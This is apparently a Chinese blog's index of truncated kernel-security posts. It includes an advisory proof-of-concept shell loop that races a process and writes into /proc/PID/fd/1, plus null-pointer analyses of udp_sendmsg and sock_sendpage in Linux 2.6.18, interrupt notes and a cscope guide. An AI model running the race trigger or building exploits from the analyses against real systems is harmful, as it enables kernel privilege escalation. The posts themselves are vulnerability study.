漏洞公告是11.3号发出的， exp试了几个版本的都无效， 不过漏洞还是有的， 只是很难触发。公告上给出了一个poc：
http://www.nsfocus.net/vulndb/14025
while : ; do
{ echo y ; sleep 1 ; } | { while read ; do echo z$REPLY; done ; } &
PID=$!
OUT=$(ps -efl | grep 'sleep 1' | grep -v grep |
{ read PID REST ; echo $PID; } )
OUT="${OUT%% *}"
DELAY=$((RANDOM * 1000 / 32768))
usleep $((DELAY * 1000 + RANDOM % 1000 ))
echo n > /proc/$OUT/fd/1  

udp_sendmsg空指针漏洞分析    by wzt

漏洞描述：

由于Linux ipv4协议栈中udp_sendmsg()函数设计上存在缺陷， 导致struct rtable *rt以空指针形式传递给ip_append_data(), 从而引发kernel oops,
攻击者可以利用此漏洞提升进程权限。漏洞影响2.6.19以下的版本。

漏洞成因:

>> linux+v2.6.18/net/ipv4/udp.c

int udp_sendmsg(struct kiocb *iocb, struct sock *sk, struct msghdr *msg,
size_t len)
{
...
// rt被初始化成NULL
struct rtabl

Linux sock_sendpage空指针漏洞分析

>> linux-2.6.18/net/socket.c

static ssize_t sock_sendpage(struct file *file, struct page *page,
int offset, size_t size, loff_t *ppos, int more)
{
struct socket *sock;
int flags;

sock = file->private_data;

flags = !(file->f_flags & O_NONBLOCK) ? 0 : MSG_DONTWAIT;
if (more)
flags |= MSG_MORE;

return sock->ops->sendpage(sock, page, offset, size, flags);
}
sock_send

中断处理程序用到的所有数据有保存在当前进程的内核堆栈中（一般情况下），如果此时发生了
进程切换，中断处理程序将被阻塞， 当在一次发生进程切换时，不一定马上就换回来。比如当
发生一个键盘中断时，键盘处理程序正在进行，此时又恰好发生了进程抢占，切换到了另一个进程
中，假如那个进程不会引起内核的稳定，那么中断处理程序将一直阻塞，内禾根本就没法响应那个中断，
直到在一次发生进程切换。假设最后又切换回执行中断处理程序的那个进程中时，如果它的内核堆栈
受到了无意的破坏怎么办呢？那中断处理程序

以下是在我的ubuntu 8.10环境：

1、首先把cscope装上：sudo apt-get install cscopew
2、下载 cscope_maps.vim: cscope.sourceforge.net/cscope_maps.vim将里面的c内容加入到/etc/vim/vimrc中。

3、下载linux kernel源代码: www.kernel.org/pub/linux/kernel/v2.6/

4、建立一个cscope.sh脚本文件用于生成cscope.files文件：

#!/bin

我不是专业的kernel开发者， 只能利用业余时间来搞搞kernel， 很羡慕那些天天从事这方面的兄弟们。
从今天开始每天坚持2个小时来学习kernel，blog就当学习笔记了， 定时跟大家分享下我的学习成果。
从内存管理开始， 进一步完善对这块的理解！